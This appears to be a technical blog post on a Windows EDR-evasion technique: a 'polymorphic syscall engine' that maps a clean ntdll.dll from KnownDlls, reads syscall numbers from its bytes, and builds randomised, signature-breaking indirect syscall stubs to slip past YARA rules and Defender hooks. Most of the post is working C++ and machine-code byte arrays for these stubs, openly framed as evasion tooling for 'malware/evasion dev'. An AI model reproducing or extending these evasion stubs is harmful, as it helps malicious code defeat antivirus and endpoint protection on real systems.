Polymorphic Syscall Engine
In this blog we will be talking about syscalls, and how to make them a lil stealthy. The projects like HellsGateEXTERNAL LINK TOhttps://github.com/am0nsec/HellsGate, Halo's GateEXTERNAL LINK TOhttps://github.com/boku7/AsmHalosGate
, HellsHallEXTERNAL LINK TOhttps://github.com/Maldev-Academy/HellHall
, etc. are the pioneers of these methods which work, but lacks stealth as they produce syscall stubs which are easily detected by basic yara rules. This blog is based on my project YetAnotherGate and will be covering the core logic some what in detail.
Setup
Everything which we are going to talk about is done on latest Windows and defender versions, which at the time of writing this blog are -
Windows OS
- Edition: Windows 11 Pro
- Version:
25H2 - OS Build:
26200.7840
Defender Engine
- Client:
4.18.26010.5 - Engine:
1.1.26010.1 - AV / AS:
1.445.222.0
Environment
Everything is created and built to test modern security with all security feature turned ON:
✓ Real-time protection
✓ Tamper Protection
✓ Memory integrity
✓ Memory access protection
✓ Microsoft Vulnerable Driver Blocklist
This is not just any project built to run in a vulnerable environment with security features turned off. This is some serious work and hence made just for education and research purposes.
Syscalls
Modern operating systems are built on the concept of Protection RingsEXTERNAL LINK TOhttps://en.wikipedia.org/wiki/Protection_ring, User Space (Ring 3) is where your everyday programs run (web browsers, games, word processors). Programs here are restricted. They cannot directly access hardware, read arbitrary memory, or manage the network. Kernel Space (Ring 0) is the core operating system. It has absolute control over everything, the CPU, memory, hard drives, and network interfaces. If a user program wants to do something useful like read a file from the hard drive, print text to the screen, or send a network packet, it cannot do it directly. It must ask the kernel to do it. The syscall instruction is the mechanism for making that request.

WriteFile flow path from O'Reilly ↗EXTERNAL LINK TOhttps://oreilly.com
A really nice example we can see it the flow path of WriteFile. We can see when the process calls WriteFile which exists in Kernel32.dll the function calls another less abstracted function NtWriteFile inside another system library ntdll.dll and then the cup transitions from user mode to kernel mode after the syscall instruction. ntdll.dll is a very important dll in this cat and mouse game between security venders and malware authors, as it contains all the SSNs for all the functions which we are going to talk about.
Syscalls via a debugger
Let us look at some syscall stubs via a debugger. We can use x64Dbg to catch any function and look what SSN (System Service Number) it has.

NtWriteFile inside the debugger
In the above image, I have opened x64Dbg and to find SSN of any function we can simply, go to the "Symbols" tab and in the left panel we can see all the dlls which the process has loaded. We can find ntdll.dll in the bottom, clicking on which we can see all the functions it exports, one of them is NtWriteFile with Ordinal 688. Double clicking on the entry brings us back to the “CPU” tab where we can see the following:

NtWriteFile syscall stub
From the debugger we can see something like this:
mov r10, rcx
mov eax, 8
syscall
These 3 instructions are very important, and if you look closely in the above image, every function has the same pattern, the only difference we can find is in the number in the mov eax, 8 instruction. The number 8 is the SSN for the function. So, this means if we know the SSN of a function we can create a syscall stub for it and execute it ourselves.
The Security Landscape
Now that we know what happens we a function is called and what syscalls are, we can now understand the security landscape and get a gist why syscalls are so important.
Security solutions love to hook functions in both user mode and kernel mode, for any security researcher or threat actor bypassing these hooks becomes very important in order not to get flagged. By placing the parameters on to the stack in compliance with x64 calling conventionEXTERNAL LINK TOhttps://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170 and building and executing the syscall stub with the specific
SSN one can bypass these user mode hooks.
EDRs/AVs know this and hide the SSN by patching the ntdll.dll for the process. Security vendors do this by injecting their own dll in the process which patches the ntdll.dll.
Knowing this, researchers have found ways to still get their hands on a clean ntdll.dll to get the SSNs, some of the techniques are BlindsideEXTERNAL LINK TOhttps://github.com/CymulateResearch/Blindside,
Reading from diskEXTERNAL LINK TOhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
, etc. But all these techniques have their own detection vectors.
YetAnotherGate
YetAnotherGate focuses to eliminate one of the detection vectors in modern syscall implementations. Stubs generated by modern solutions can be easily detected by YARA rules like:
rule Detect_Direct_Syscall_Stub_08
{
strings:
// 4C 8B D1 : mov r10, rcx
// B8 00 00 00 00 : mov eax, 0x00000000
// 0F 05 : syscall
$syscall_sequence = { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 }
condition:
$syscall_sequence
}
YetAnotherGate don’t just generates the subs but generates obfuscated assembly stubs via a method which obfuscates assembly via De-optimisation inspired by this Phrack articleEXTERNAL LINK TOhttps://phrack.org/issues/71/15_md#article. You can find the working poc on the below link:
SSN retrival
As we talked about how security solutions like to hide the SSN, we will have to use one of the methods to retrieve a clean ntdll.dll. This part of the project always has a room for improvement as security solutions catch up really fast but right now we will retrieve a clean copy from KnownDlls.
Clean ntdll.dll
Windows caches frequently used system DLLs in a special kernel object directory called \KnownDlls to speed up process creation, So we can target it. This is not the best way to do this, but for now we will work with it.
You will see me calling functions like fn.MyNtOpenSection instead of NtOpenSection, fn is just a structure to hold functions which are been dynamically linked and having My as a predecessor in the actual implementation.
and you will also find some custom wrappers like err and norm for logging.
InitUnicodeString(usName, L"\\KnownDlls\\ntdll.dll");
InitializeObjectAttributes(&objAttr, &usName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NTSTATUS status = fn.MyNtOpenSection(&hSection, SECTION_MAP_EXECUTE | SECTION_MAP_READ, &objAttr);
if(!NT_SUCCESS(status))
{
err("NtOpenSection failed: 0x%X", status);
return 0;
}
We request a handle (hSection) to the memory section containing the clean ntdll.dll and ask for SECTION_MAP_EXECUTE and SECTION_MAP_READ permissions. We absolutely need the execute permission cause we will make the stubs reflective.. we will talk about it later.
status = fn.MyNtMapViewOfSection(hSection, fn.MyGetCurrentProcess(), &base, 0, 0, nullptr, &viewSize, ViewShare, 0, PAGE_EXECUTE_READ);
if(!NT_SUCCESS(status))
{
err("MyNtMapViewOfSection Failed");
return 0;
}
fn.MyNtClose(hSection);
sLibs.hUnhookedNtdll = (HMODULE)base;
norm("\nClean ntdll.dll address via fallback (KnownDlls :/ ) -> 0x", std::hex, CYAN"", sLibs.hUnhookedNtdll);
This is the core action. We take the handle to the clean ntdll.dll section and map it into the virtual memory space of the current process (MyGetCurrentProcess()). The newly mapped memory is marked as readable and executable, which is necessary because we intend to run it later. base now stores the address of the clean ntdll.dll.
SSN
Now all we need to do is, get the SSN for the functions we need. For this we will need to scan the bytes of the function for specific byte patterns. We should usually avoid relying on byte patterns as much as we can if Microsoft decides to change anything related to this in the OS, stuff might break for us, but in this case we can get away with it cause changing syscall stubs will require some serious changes in the OS, which is not going to happen soon.
We should also see the hex values for each instruction, so we know what are we looking for:
So, now we have a clean ntdll.dll we can use GetProcAddress to find the required function. Once we have the function's address we can traverse it like:
BYTE* pBytes = reinterpret_cast<BYTE*>(vpfunction);
if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1)
{
norm("\n");ok("Function ", sEntry[j].function_name," is Unhooked\n");
for(int i = 0; i < 32; ++i)
{
if(sEntry[j].SSN != 0 && sEntry[j].pCleanSyscall != nullptr) break;
if(!sEntry[j].SSN && i + 4 < 32 && pBytes[i] == 0xB8)
{
sEntry[j].SSN = *(DWORD*)(pBytes + i + 1);
//norm("SSN:",CYAN" 0x", std::hex, sEntry[j].SSN, "\n");
}
if(!sEntry[j].pCleanSyscall && i + 1 < 32 && (pBytes[i] == 0x0F && pBytes[i+1] == 0x05))
{
sEntry[j].pCleanSyscall = pBytes + i;
//norm("Address of the Syscall: ", CYAN"0x", std::hex, reinterpret_cast<void*>(sEntry[j].pCleanSyscall), "\n");
}
}
}
You might have noticed if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1) this check, just as a precaution, we check the starting bytes to check for any hooks. If it had a hook, we would have seen a jmp instruction. So, to get the SSN once we reach the mov eax instruction which has hex code 0xB8, we can just read a DWORD from the next byte *(DWORD*)(pBytes + i + 1) and we have the SSN. As we will make the stubs reflective we should also get the address of the syscall instruction and it looks like 0F 05 which is exactly what we check here pBytes[i] == 0x0F || pBytes[i+1] == 0x05. So, now we are all set to generate the stubs which we will be covering in the next section.
De-optimization
This here is the heart of this project, so we need to understand what evasion by De-optimization is. When developers write code, compilers translate it into assembly. Modern compilers are incredibly smart; they optimize the code to make it as short, fast, and efficient as possible. Because most software is compiled this way, security tools build their detection signatures based on these predictable, highly optimized patterns and in our case they can simply look for the syscall stubs. So, in the process of De-optimization we take these efficient and clean assembly code and then intentionally make them longer, messier and less efficient. This completely changes the signature of that specific code. We can see a very basic example that the phrack post mentions is:
lea rcx, [0xDEAD] ------+-> lea rcx, [1CE54]
+-> sub rcx, EFA7
So, in this example we don't load 0xDEAD but we load 1CE54 and after these two instructions execute, the RCX register still holds 0xDEAD. The program's behavior remains identical, but the compiled bytes are now completely different.
Arithmetic Partitioning
Compilers naturally want to load hardcoded values like memory offsets, values, etc. directly into memory because it is fast. We can however break this, Instead of loading a value directly we can force the cpu to calculate it on the fly using randomized math:
mov eax, 12345678h
add dl, 25h
sub cx, 10A5h
push 0C0FFEEh
mov ebp, 0DEADBEEFh
Logical Inverse
By leveraging mathematical properties specifically De Morgan's Laws we can take a single, predictable logical instruction and mutate it into a multi-step sequence. It looks completely different in hex, but the CPU computes the exact same final result.
xor r10d, 1337BEEFh
and al, 0Fh
or edx, 0A5A5A5A5h
Register Swapping
It is exactly what it sounds like, Consider XOR RCX,0xAA. We can change the RCX register with any other 64-bit register by exchanging the value before and after the original instruction.
xor r8, 0A5A5h
add r12, 100h
mov r14, r15
Syscall Stubs
Now we can generate syscall stubs, it should look like:
mov r10, rcx
mov eax, SSN
jmp [syscall_loc]
Notice we dont call the syscall cause if we execute the instruction here, security solutions can see that the syscall instruction is executed from a very unlikely location and flag it. Hence we use the actual syscall instruction inside the ntdll.dll, so the origin looks from inside the system dll.
In our syscall stub, we won't use the original instructions but use the concept of de-optimization to create different variants for each of the original instructions, and make the syscall stub by randomly selecting the generated de-optimized variants for each of the instructions.
mov r10, rcx
V1AStack Bridge & Redundant XOR
0x9c, // pushf
0x51, // push rcx
0x49, 0x31, 0xD2, // xor r10, r10
0x4C, 0x87, 0x14, 0x24, // xchg r10, [rsp]
0x59, // pop rcx
0x9d // popf
The main logic here lies in push rcx and xchg r10, [rsp] instead of moving rcx straight into r10, we push the value of rcx onto the stack and then using the xchg instruction we put it into r10 hence breaking the pattern. xor r10, r10 is redundant. However, in malware/evasion dev, inserting redundant instructions alters the byte signature and throws off linear disassembly analysis. As we xor r10, r10 it alters the CPU's condition flags, by saving the flags to the stack, the stub ensures it doesn't accidentally break any surrounding program logic and hence the pushf and popf.
V1BNon-Destructive Stack Bridge
0x9c, // pushf
0x51, // push rcx
0x4C, 0x8B, 0x14, 0x24, // mov r10, [rsp]
0x59, // pop rcx
0x9d // popf
While the previous example altered the state of the CPU by wiping out the RCX register, this one takes a much cleaner, non-destructive approach using the stack as a temporary bridge. It effectively bypasses the static 0x4C, 0x8B, 0xD1 signature but leaves every single register exactly as it found it. The heart of this approach is mov r10, [rsp] Instead of popping the stack or swapping values, this instruction simply reads the memory address currently sitting at the top of the stack (RSP) and copies its contents directly into R10.
V1CRedundant AND & Opcode Synonym
0x9c, // pushf
0x49, 0x81, 0xE2, 0x00, 0x00, 0x00, 0x00, // and r10, 0
0x49, 0x89, 0xCA, // mov r10, rcx
0x9d // popf
Here we use redundancy again, and r10, 0 performs a logical AND operation against R10 with 0. Anything ANDed with 0 becomes 0. This zeros out R10, Just like the xor r10, r10 from the first example, this instruction is functionally useless because the very next line overwrites R10 anyway. It acts purely as a 7-byte padding wall to break up linear signatures and confuse static analysis. mov r10, rcx is the hero here, notice the bytes: 0x49, 0x89, 0xCA. The standard, heavily-signatured byte sequence for mov r10, rcx that EDRs look for is 0x4C, 0x8B, 0xD1. This executes the exact same instruction but uses entirely different bytes. As we use an and we will also need to save the flags and hence the pushf and popf.
mov eax, [SSN]
V2AFragmented Additive Reconstruction
0x31, 0xC0, // xor eax, eax
0xB0, 0x00, // mov al, SSN_LOW
0x81, 0xC0, 0x00, 0x00, 0x00, 0x00 // add eax, SSN_HIGH_SHIFTED
Instead of moving data into the full 32-bit EAX register, we target AL, which is the lowest 8-bit section of EAX. We move the lowest byte of the syscall number into this slot using mov al, SSN_LOW
If the SSN is under 0xFF or 255, the actual SSN is already fully loaded here.
We now add the remaining upper bytes of the syscall number to the EAX register by add eax, SSN_HIGH_SHIFTED and EAX now perfectly holds the intended SSN, ready for the syscall instruction.
V2BThe Bifurcated SSN Load
0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, X
0x05, 0x00, 0x00, 0x00, 0x00 // add eax, Y
Instead of loading SSN directly, we construct it at the runtime. We create numberA and numberB such that numberA + number = SSN. This requires a lil bit of pre-processing as you can see.
BYTE randNum = (BYTE)(rand() % 0x50);
*(DWORD*)(byte_stub + 1) = randNum;
*(DWORD*)(byte_stub + 6) = sEntry->SSN - randNum;
If you are still reading this blog, I would assume you know whats happening here and save my energy from explaining these basic stuff.
V2CStack-Bridged SSN Load
0x9C, // pushfq
0x31, 0xC0, // xor eax, eax
0x68, 0x00, 0x00, 0x00, 0x00, // push SSN
0x58, // pop rax
0x9D, // popfq
This stub completely avoids the standard mov eax, SSN by routing the SSN through the stack. Pretty basic, push SSN pushes the hardcoded SSN directly onto the top of the stack and pop rax pops the value sitting at the top of the stack (SSN) directly into the 64-bit RAX register. We will also need to save the falgs because we are also using xor.
jmp [syscall_loc]
V3AThe XCHG-RET Trampoline
0x50, // push rax
0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, syscall_addr
0x48, 0x87, 0x04, 0x24, // xchg rax, [rsp]
0xC3 // ret
As we want to avoid detection by security solutions, we make our stub reflective and make a jump to the syscall address instead of directly hardcoding the syscall instruction. Remember from our previous stubs that RAX may hold our carefully constructed Syscall Service Number (SSN). If RAX changes, the kernel won't know what function you want to call. So, to avoid this we push the rax register on the stack. Now, mov rax, syscall_addr loads a memory address into RAX. This address points to a legitimate syscall instruction already sitting naturally somewhere inside ntdll.dll. The magic lies in, xchg rax, [rsp] it swaps the value in RAX (the ntdll.dll address) with the value sitting at the top of the stack ([RSP], which is your SSN) and finally ret instruction pops the memory address off the top of the stack and jumps to it effectively loading it into the CPU's Instruction Pointer.
V3BThe Pushf-Allocated ROP Jump
0x9C, // pushf
0x48, 0xC7, 0x04, 0x24, // mov dword [rsp], imm32 (lower half)
0x00, 0x00, 0x00, 0x00,
0xC7, 0x44, 0x24, 0x04, // mov dword [rsp+4], imm32 (upper half)
0x00, 0x00, 0x00, 0x00,
0xC3, // ret
This stub builds on the trampoline concept from the last example, but it introduces a completely new way to construct the jump address and allocate stack space. Instead of moving an address into a register and pushing it, this stub constructs the jump address directly inside the stack memory, piecemeal. Here pushf is used for a completely different reason: stealthy stack allocation.
Pushing flags automatically subtracts 8 from the Stack Pointer (RSP = RSP - 8) we just allocated 8 bytes of space on the stack without using a highly visible sub rsp, 8 or push rax instruction.
The fact that it wrote the RFLAGS data into that space doesn't matter, because the next instructions will immediately overwrite it.
mov dword [rsp], imm32 takes the lower 32 bits of the target memory address and writes them directly into the lower 4 bytes of the space we just allocated on the stack.
mov dword [rsp+4], imm32 takes the upper 32 bits of the target address and writes them directly into the upper 4 bytes of that same stack space (RSP + 4). The stack memory at [RSP] now perfectly contains the full 64-bit memory address.
You might have noticed, we pushed the flags but didnot pop the flags out. If you executed popf here, the CPU would take the 64-bit address we just painstakingly built and shove it into the RFLAGS register, removing it from the stack. That would ruin the payload and likely crash the program.
And finally ret pops the 64-bit value currently sitting at the top of the stack into the Instruction Pointer (RIP) and we are done.
V3BThe Basic Jump
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00, // jmp [rip+0]
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 // syscall address
We could also just fall back to the old bread and butter as we are already avoiding the syscall via the jmp.
Future Improvements
ntdll.dll Sourcing
We heavily depend on known methods to fetch a clean ntdll.dll. While some methods currently work, others will likely fail as security solutions evolve. Implementing dynamic, robust sourcing is a top priority.
Instruction Variant Expansion
We plan to expand our mutation engine to add far more de-optimized variants for different instructions, drastically increasing the randomness and entropy of the generated stubs.